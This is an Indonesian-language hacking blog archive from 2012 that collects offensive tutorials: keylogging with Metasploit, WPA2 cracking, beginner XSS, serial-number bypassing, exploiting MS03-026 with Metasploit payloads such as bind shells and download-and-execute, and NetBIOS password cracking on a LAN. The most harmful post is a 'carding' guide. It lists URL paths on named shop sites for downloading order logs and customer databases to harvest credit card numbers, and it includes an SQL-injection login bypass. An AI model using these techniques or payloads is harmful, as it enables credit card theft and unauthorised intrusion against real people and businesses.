Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, September 16, 2012

Keylogger dengan Metaspoit


   Assalamu`alaikum sekarang saya akan mengshare keylogger dengan metasploit dan cukup berguna untuk merekam kegiatan target di komputernya,Btw mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih), iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama

Wi-Fi Cracking With Backtrack

Sekarang saya iseng-iseng kembali share tentang cracking Wi-Fi  WPA2 dengan menggunakan backtrack 5 saya terinspirasi karena sekarang Pasti begitu banyak dan sangat mudah mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)

Resource Hacking

Kesempatan kali ini saya akan posting tentang resource hacker.

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

XSS attack untuk pemula


  Saya berkeinginan membagikan sedikit yang saya punya. mungkin ini sekedar tutor cupu dari seorang new bee kaya saya ne.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.


Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah

Menembus proteksi serial number dan password

Latar belakang
Mungkin dalam keseharian ada di antara kita yang tidak sengaja menghilangkan Password atau Serial Number dari program yang sudah kita beli. Kalau sudah begitu tentunya repot. Untuk mendapatkannya kembali bisa saja dengan menghubungi toko retail maupun vendor program tempat program tersebut dibeli. Namun, jika ada peraturan dari vendor yang mengharuskan membeli ulang password maupun serial number yang hilang, bagaimana? Bagi Anda mungkin itu bukan masalah . Tapi bagi Saya itu mungkin salah satu masalah besar. Dari kasus inilah Saya mencoba menerapkan kegunaan Win32 Hook. Sekedar informasi, teknik seperti ini sering digunakan oleh para Reverser di dunia Reverse Engineering. Untuk melakukan debugging file berukuran besar bukan hal yang mudah, memerlukan waktu lama dan harus didukung dengan hardware yang cukup mewah. Bayangkan saja

Hacking "C" Card

Assalamu`alaikum Wr.Wb.

     Sekarang saya akan mencoba share sedikit tentang carding untuk yang baru mau mengenal dunia carding. Mohon di abaikan bagi master-master carding di luar sana,yang pastinya sangat mahir dalam melakukan carding ini.
     Saya harap ini jangan digunakan untuk hal-hal yang merugikan orang lain karena kegiatan ini tergolong tindak kejahatan, oleh karena itu. Sebaiknya ini di jadikan pengetahuan semata dan di gunakan untuk para calon administrator web shopping cart agar lebih teliti dan safety dalam mengelola database,log,dan web itu sendiri.

Ok Lets begin >>>>>

1. CGI store Log

     Disini kamu harus usaha sendiri untuk mencari target yang akan kamu pakai cc nya.
Coba gunakan ini:

A. http://www.chaswells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
B. And then delete Repair_Manuals.htm in url/browsing  sehingga menjadi http://www.chaswells.com/cgi-bin/store/index.cgi?page=
C. Input file is behind the web :
.../admin/files/order.log
for example : http://www.cashwells.com/cgi-bin/store/index.cgi?page=admin/file/order.log
D. So that comes out from the site is number cc (credit card).

2.   Admin Take Over

Same as above you must try yourself to find the target.
This should be done:

A. http://www.partsupply.in.th/shopadmin.asp
B. And then next use sql injection techniques
     user : 'or"='
     pass : 'or"='
C. Trus kamu buka file" yang ada disana satu persatu. Dapat deh no CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. TApi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. coba cari lagi target yang lain.

3. Database Downloadable

Same as above you must try yourself to find the target.
This should be done:

A. http://www.youngsliquors.com/winestore/shopadmin.asp
B. And then next delete shopadmin.asp in url/browsing so be http://www.youngsliquors.com/winestore/
C. Input file is behind the web:
     shopdbtest.asp
     for example : http://www.youngsliquors.com/winestore/shopdbtest.asp
 D. And then look the name database and the place : xDatabase and xDblocation
    example:
    xDatabase : shopping300
    xDatabase :..../.../../.../www.youngsliquors/5498761211
E. Sekarang untuk mendownload file shopping300 dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.youngsliquors.com/winestore/shopping300.mdb
F. Kalo sudah di download, buka file shopping300.mdb dengan ms.Access.

4. Metacart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.imagexpres.com/metacart/moreinfo.asp
B. And then next delete moreinfo.asp in url/browsing so be http://www.imagexpres.com/metacart/
C. Input file is behind the web ;
     database/metacart.mdb
     example : http://www.imagexpres.com/metacart/database/metacart.mdb
D. Kalo sudah di download, buka file metacart.mdb dengan ms.access

5. PDshopPro Shopping Cart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.marktwainbooks.com/shop/category.asp?catid=4
B. And then next delete shop/category.asp?catid=4 in url/browsing so be http://www.marktwainbooks.com
C. Input file is behind the web:
     admin/dbsetup.asp
     example : http://www.marktwainbooks.com/admin/dbsetup.asp
D. Maka yang keluar dari situs itu adalah:
     Your Database Type:
     Microsoft Access
     Your Connection String :
     Driver={Microsoft Access Driver(*.mdb)};DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
     Current Status :
     Connection to Database OK.
     Database Primary 'setup' Table Found!
     Database Permissions OK!
E. Sekarang untuk mendownload file pdshoppro.mdb dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.marktwainbooks.com/data/pdshoppro.mdb
F. Kalo sudah di download, buka file pdshoppro.mdb dengan Ms.Access.

Ok,itu sebagian cara untuk teknik mencari data CC target.

----------------------------------------------------------------------------------------------
Ini hanya sebuah informasi yang perlu anda ketahui.
Semoga bermanfaat.
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

Hacking menggunakan Metasploit

       METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.

Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 4.0, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 4.0 lebih banyak exploitnya. Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim buffer Overflow pada system korban, sehingga kita dapat mentakeover shellnya.
Langsung saja, berikut installasinya di Windows.

1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google.

2.  Kemudian install, dan jalankan msfweb.











Maka akan muncul window shell seperti berikut.


3. Buka Web Browser bisa Internet Explorer, Mozilla, Google Chrome, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.

 

Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti.

4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). 

Download NMAP di  


5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.

 

Pilih target pada pilihan Select Target

6. Memilih Payload

 

Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi-fungsi payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (I like it).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.


RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port


Setelah di isi semua, kemudian klik exploit untuk memulai menghack target.

Selamat mencoba.

Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/



  •  Nie nte klo mau nonton video tutorial metasploit menggunakan Armitage :


Hacking LAN

Hack Local Area Network 

This technique will be taking advantage of Port 139.
Most of the time, Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.

You now need to create a null session to the target computer.

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.

We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
“5 21 861567501 1383384898 839522115 500″.
Please leave out the S-1-,leave out all the – too.

Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.

Prepare yourself a good wordlist.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be on your screen.
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:

Sumber:
ozcorp@team

  • Bonus nie: 



 Mantap kan gan??